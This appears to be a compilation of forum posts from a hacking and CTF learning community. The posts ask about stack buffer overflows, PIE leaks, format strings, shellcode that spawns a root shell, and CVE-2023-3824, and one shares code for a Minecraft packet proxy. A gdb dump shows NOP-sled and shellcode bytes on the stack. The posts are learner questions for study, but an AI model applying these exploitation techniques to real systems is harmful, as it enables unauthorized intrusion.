Hello,

I have a binary that has PIE, ASLR, nx, full RELRO, no canary. there is buffer overflow vulnerability, but no string format vulnerability (nothing gets printed with user input). how can i leak pie base address?

Hello, I am learning about buffer overflow. I have a 32-bit binary. I crafted a payload that overwrites stack/eip to go to libc where jmp esp is. According to gdb it jumps to libc, but sends segfault on jmp esp. Why is that?

Stack is executable. esp points to nop sled. here is more info:

[----------------------------------registers-----------------------------------]

EAX: 0xffffffff

EBX: 0xf7e1dff4 --> 0x21dd8c

ECX: 0x804a07e ("Mail sent\n")

EDX: 0xffffffb8

ESI: 0x804bf04 --> 0x8049200 (<__do_global_dtors_aux>: endbr32)

EDI: 0xf7f7fba0 --> 0x0

EBP: 0x41414141 ('AAAA')

ESP: 0xffb0d970 --> 0x90909090

EIP: 0xf7c06691 --> 0x761be4ff

EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)

[-------------------------------------code-------------------------------------]

=> 0xf7c06691: jmp esp

| 0xf7c06693: sbb esi,DWORD PTR [esi-0x1b]

| 0xf7c06696: mov ebx,ebp

| 0xf7c06698: and bl,bl

|-> 0xffb0d970: nop

0xffb0d971: nop

0xffb0d972: nop

0xffb0d973: nop

JUMP is taken

[------------------------------------stack-------------------------------------]

0000| 0xffb0d970 --> 0x90909090

0004| 0xffb0d974 --> 0x90909090

0008| 0xffb0d978 --> 0x315e16eb

0012| 0xffb0d97c --> 0x64688c0

0016| 0xffb0d980 --> 0x1e8d27b0

0020| 0xffb0d984 --> 0x1edb966

0024| 0xffb0d988 --> 0x1b080cd

0028| 0xffb0d98c --> 0x80cddb31

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

Stopped reason: SIGSEGV

0xf7c06691 in ?? () from /lib32/libc.so.6

Mapped address spaces:

Start Addr End Addr Size Offset Perms objfile

0x8048000 0x8049000 0x1000 0x0 r--p /home/kali/Downloads/binary/test/bin

0x8049000 0x804a000 0x1000 0x1000 r-xp /home/kali/Downloads/binary/test/bin

0x804a000 0x804b000 0x1000 0x2000 r--p /home/kali/Downloads/binary/test/bin

0x804b000 0x804c000 0x1000 0x2000 r--p /home/kali/Downloads/binary/test/bin

0x804c000 0x804d000 0x1000 0x3000 rw-p /home/kali/Downloads/binary/test/bin

0x89d4000 0x89f6000 0x22000 0x0 rw-p [heap]

0xf7c00000 0xf7c22000 0x22000 0x0 r--p /usr/lib32/libc.so.6

0xf7c22000 0xf7d9b000 0x179000 0x22000 r-xp /usr/lib32/libc.so.6

0xf7d9b000 0xf7e1c000 0x81000 0x19b000 r--p /usr/lib32/libc.so.6

0xf7e1c000 0xf7e1e000 0x2000 0x21b000 r--p /usr/lib32/libc.so.6

0xf7e1e000 0xf7e1f000 0x1000 0x21d000 rw-p /usr/lib32/libc.so.6

0xf7e1f000 0xf7e29000 0xa000 0x0 rw-p

0xf7f52000 0xf7f54000 0x2000 0x0 rw-p

0xf7f54000 0xf7f58000 0x4000 0x0 r--p [vvar]

0xf7f58000 0xf7f5a000 0x2000 0x0 r-xp [vdso]

0xf7f5a000 0xf7f5b000 0x1000 0x0 r--p /usr/lib32/ld-linux.so.2

0xf7f5b000 0xf7f7d000 0x22000 0x1000 r-xp /usr/lib32/ld-linux.so.2

0xf7f7d000 0xf7f8b000 0xe000 0x23000 r--p /usr/lib32/ld-linux.so.2

0xf7f8b000 0xf7f8d000 0x2000 0x30000 r--p /usr/lib32/ld-linux.so.2

0xf7f8d000 0xf7f8e000 0x1000 0x32000 rw-p /usr/lib32/ld-linux.so.2

0xffb55000 0xffb76000 0x21000 0x0 rwxp [stack]

It looks like the server which liveoverflow hosted for the series is offline (after masscanning). Does anyone maybe know another server which provides HACKED like challenges?

Hey there! Question - So Im reading HTAoE and ofcourse Im stuck on format strings. There are a few typos and lack of clarities that make this particular section very challenging to newcommers. Anyways, I'm curious about something.

The book towards the beginning mentions that the arguments are pushed to the stack in reverse order (not sure if architecture makes a difference, but it's x86 Unix world) - Ubuntu kernel 2.6.20-15 in case it matters.

Anyways, what's confusing me is the nature of the random reads of memory addresses from the printf function.

Yes, yes, I get it - it's reading from an address located at EBP + [something] as it's an argument...

Aaand, because printf is a function, it's reading from an older (aka earlier / more senior stack frame). However, does this mean that even though arguments are pushed in reverse order to the stack, the argument increment is lower?

For example, let's say you're pushing 3 kids to the stack:

printf("Hello kids! Get on the stack %s! You too %s! And don't try to hide %s!\n", &OldestKid, &MiddleChild, &YoungestKid)

Does this mean that if we opened this with GDB, we'd be looking at something like this?:

[EBP + 12] //OldestKid
[EBP + 8] //MiddleChild
[EBP + 4] //YoungestKid

(with the first argument having the highest ebp increment?)

I ask because it's a bit confusing to understand why specifically some arguments are reading sooome values arbitrarily on the stack....

Anyways, I appreciate your patience with me. Please explain it to me as a child if you can - for myself and potentially others that come across it. Resources are also welcome!

I started diving into CTFs with LiveOverflow’s binary exploitation tutorials, which taught me a lot. I also delved into web security through web CTFs. However, I’ve always tended to skip the crypto challenges because they seemed impossible to me, aside from some basic knowledge in Vigenère and XOR. Can anyone recommend good resources for learning cryptography? How did you become good in crypto CTFs?

I recently came across CVE-2023-3824, which has been rated as critical with a score of 9.8. This vulnerability constitutes a Remote Code Execution (RCE) and does not require any user interaction. The description for this CVE is as follows:

​

"In PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading a phar file and reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, potentially resulting in memory corruption or RCE."

​

Now, my question is: how can an HTTP request sent to a website or web server trigger the loading of a phar file and cause this vulnerability? Should there be a specific portion of the code that allows this vulnerability to occur? I'm curious because this bug's presence led to the downfall of the largest ransomware gang.

​

Additionally, there was a GitHub issue that further confused me. Here is the link for reference:
Git issue
NVD post

tried exploiting ROP based Buffer Overflow. It was indeed a great learning curve. checkout https://vandanpathak.com/kernels-and-buffers/return-oriented-programming-buffer-overflow-part-1/

i have figured out the the \x84 is causing the glitch coz if i put something else in it's place the rest of the memory address is good but as soon as i use \x84 the memory address get fucked up.

https://preview.redd.it/rimitw0ok1oc1.png?width=949&format=png&auto=webp&s=b277df9e5573a2c30affe0cd9acbc1a83caf2c36

https://preview.redd.it/39rnl9nqk1oc1.png?width=955&format=png&auto=webp&s=793f48fbb4cd549e70e6b17c6e7c15aad0c4dbb4

https://preview.redd.it/i53ulstok1oc1.png?width=875&format=png&auto=webp&s=49ebfc3b1fbfcd1c392681ef7f3494717be27f30

I'm watching this video: https://www.youtube.com/watch?v=1S0aBV-Waeo, and trying to perform a buffer overflow attacks, on the same program as shown in the video. The problem is I'm not finding a shellcode, that runs a shell as root. I copied and tried to run the same shellcode shown in the video, and also some couple of shellcodes from this website: https://shell-storm.org/shellcode/index.html, but the result is the same: process 48506 is executing new program: /usr/bin/bash. Can someone point me to some shellcode, that will runs a shell as root, or any material regarding this issue. And does anyone know if Linux has some sort of defense mechanisms that forbid code run in normal user space to run root terminals? Some info about my system, I'm on a Linux machine, my program is 32-bit, and I've disabled ASLR, compiled with -fno-stack-protector, -no-pie, and -z execstack.

I was watching this video: https://www.youtube.com/watch?v=HSlhY4Uy8SA&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=15, and tried to do something similar, but I'm facing the problem of keep my shell alive after the execution. A detailed explanation can be found here: https://unix.stackexchange.com/questions/771625/how-to-keep-a-shell-alive-after-it-gets-started-from-inside-a-program?noredirect=1#comment1473006_771625

Hello all, I am new to bug bounty hunter, and I want to learn about this field, and I am a person who likes to learn with actual problems, not just read or watch tutorials. So my question is, where can I find a website or even a place that offers money for finding bugs (web similar to https://bughunters.google.com/ )?

Is there any way to proxy MQTT communication just like we for http traffic in burpsuite? If not what are the other tools and way to achieve that?

I have a question regarding WinRAR RAR archives. I recently came across a password-encrypted archive (file.rar), and I'm curious to know if there's a way to determine the specific version of the software that was used to create it.
thanks.

I'd figure I ask this question here since a lot of people in the Minecraft Proxy scene know LiveOverflow because of his Minecraft:HACKED series.

I'm trying to make a minecraft proxy so I can intecept packets, change them, drop them and create new packets. My requirement is also that the program can run on server in online mode.I've tried to run the code from LiveOverflow's first video in the series, which can be found here: https://github.com/LiveOverflow/minecraft-hacked/blob/main/01_protocol_proxy/teleport_proxy.py

The code is as follows:

from twisted.internet import reactor
from quarry.net.proxy import DownstreamFactory, Bridge
import struct
import time
import random
import math

# based on https://github.com/barneygale/quarry/blob/master/examples/client_chat_logger.py

class QuietBridge(Bridge):
    entity_id = None
    prev_pos = None
    prev_look = None

    def packet_upstream_chat_message(self, buff):
        buff.save()
        chat_message = buff.unpack_string()
        print(f" >> {chat_message}")

        if chat_message.startswith("/port"):
            _, distance = chat_message.split(" ")
            flags = 0
            teleport = 0
            dismount = 0
            x, y, z, ground = self.prev_pos
            yaw, pitch, ground = self.prev_look
            # see net.minecraft.entity.Entity:getRotationVEctor()
            f = pitch * 0.017453292
            g = -yaw * 0.017453292
            h = math.cos(g)
            i = math.sin(g)
            j = math.cos(f)
            k = math.sin(f)
            _x = i*j
            _y = -k
            _z = h*j
            x += _x * float(distance)
            y += _y * float(distance)
            z += _z * float(distance)
            buf = struct.pack('>dddffBBB', x, y, z, yaw, pitch, flags, teleport, dismount)
            self.downstream.send_packet('player_position_and_look', buf)

        buff.restore()
        self.upstream.send_packet("chat_message", buff.read())

    def packet_unhandled(self, buff, direction, name):
        print(f"[*][{direction}] {name}")
        if direction == "downstream":
            self.downstream.send_packet(name, buff.read())
        elif direction == "upstream":
            self.upstream.send_packet(name, buff.read())

    def packet_upstream_player_position(self, buff):
        buff.save()
        x, y, z, ground = struct.unpack('>dddB', buff.read())
        print(f"[*] player_position {x} / {y} / {z} | {ground}")
        self.prev_pos = (x, y, z, ground)
        buf = struct.pack('>dddB', x, y, z, ground)
        self.upstream.send_packet('player_position', buf)

    def packet_upstream_player_look(self, buff):
        buff.save()
        yaw, pitch, ground = struct.unpack('>ffB', buff.read())
        print(f"[*] player_look {yaw} / {pitch} | {ground}")
        self.prev_look = (yaw, pitch, ground)
        buf = struct.pack('>ffB', yaw, pitch, ground)
        self.upstream.send_packet('player_look', buf)


class QuietDownstreamFactory(DownstreamFactory):
    bridge_class = QuietBridge
    motd = "LiveOverflow Proxy"


# python basic_proxy.py -q 12345
def main(argv):
    # Parse options
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("-a", "--listen-host", default="0.0.0.0", help="address to listen on")
    parser.add_argument("-p", "--listen-port", default=55555, type=int, help="port to listen on")
    parser.add_argument("-b", "--connect-host", default="127.0.0.1", help="address to connect to")
    parser.add_argument("-q", "--connect-port", default=25565, type=int, help="port to connect to")
    args = parser.parse_args(argv)

    # Create factory
    factory = QuietDownstreamFactory()
    factory.connect_host = args.connect_host
    factory.connect_port = args.connect_port

    # Listen
    factory.listen(args.listen_host, args.listen_port)
    reactor.run()


if __name__ == "__main__":
    import sys
    main(sys.argv[1:])

Note that my server runs on port 25565 and that I am trying to connect to server via the serveradress of localhost:55555 in my minecraft client.

When I run this code en join my local server it give the error:

Auth failed: [<twisted.python.failure.Failure OpenSSL.SSL.Error: [('system library', '', ''), ('STORE routines', '', 'unsupported'), ('system library', '', ''), ('STORE routines', '', 'unsupported'), ('system library', '', ''), ('STORE routines', '', 'unsupported'), ('system library', '', ''), ('STORE routines', '', 'unsupported'), ('SSL routines', '', 'certificate verify failed')]>]

I have found numerous people saying is has somethin to do with windows and OpenSSL and other claiming it being a problem with Microsoft authentication since quarry stills tries to login using only your mojang credentials.

Does anyone kwow any solutions?

​

​

I have only got a proxy working using this: https://github.com/TheStaticTurtle/MineProxyThe problem is that this code is so segmented and overall huge, I just can't find any packet to modify or to do anything with it. The code just works as a proxy but i can't do anything more with it

​

I've been working on this challenge for about 5 hours, I know what I'm supposed to do, but I'm having problems with a strange null byte that appears at the start of the address that the shell code get injected into. When attempting to inject my shellcode, it changes the first few bytes to an instruction that crashes the program. I have found that with certain inputs the null byte is overwritten by the input, but I cannot figure out what causes it to get overwritten. I looked at a few writeups, and none of them mention the null byte. Thanks!

https://preview.redd.it/sob6zgis2oec1.png?width=815&format=png&auto=webp&s=ad76c217045e78cc3acc0adbee241d0c8be91859

Hello there!
I am making program to read data via software from RAID array created with HP Smart Array Controller. In fact I implemented already reading RAID 0, RAID 1, RAID 5 able to read with 1 missing drive and RAID 6 able to read with 1 missing drive. What's left is RAID 6 able to read with 2 missing drives and I am stuck. I can't figure out how this controller has implemented reed solomon encoding, coz I know only basic math. I found some resource on the internet explaining how it works in simple language but it does not work for this controller. I checked if I am doing everything correctly by trying it on Linux MD RAID and it is correct, this controller has just different implementation. I created 2 arrays, 4 drive and 5 drive, added data from 0x00 to 0xff to create many combination and dumped one stripe of each drive here with the description -> https://github.com/ScuroGuardiano/SmartArrayReader/tree/master/raid-6-problem
I would be really thankful if someone could help me with this, I just have no mathematical knowledge to figure it out. I am asking here, coz I know you guys do a lot of reverse engineering so maybe someone would be able to figure it out. Have a great day or night! 🙏

Hey, I don't want to boil you guys with too much nonsense but I have some questions about my roadmap.

so currently Im a dev I can use any programming language with ease, also know about assembly can interact with windows api from x86 assembly.

I feel confident with Assembly.

1. currently at the 8th chapter of kip r irvine's book called "Assembly Language for x86 processors" (This book taught me how to code in asm)
2. I will finish this book and jump into book called: "Bryant & O' Halloron: Computer systems a programmer's perspective".
3. So what from here im planning to jump into "Operating systems: Three easy pieces"
4. I have no clue to jump from here. Maybe "Pavel yosifovich Windows internals part 1" or should I just start reverse engineering with | "Reversing: Secrets of reverse engineering" & "Practical reverse engineering Bruce Dang" (Both books are very good which I took a peak)

So my question is this. My DSA background is pretty basic. also Cryptography background goes no more further than caeser cipher & xoring generally used Libs for encryptions. Also when to start my journey with reverse engineering I'm planning to do at least 500 crack me challenges to get a really good grip. Then go with kernel exploits, buffer overflows, RCE attacks....

What do I miss out on? this is the roadmap I have in my mind.

I'm completely new to this stuff.

I completed Comptia network+ and currently ccna 200-301. I tried tryhackme it feels good.But it's not free, so I was looking for some other alternatives with best paths to follow to reach the goal

Hi, I started my own scanning project, and was wondering if the MC server was still up or not?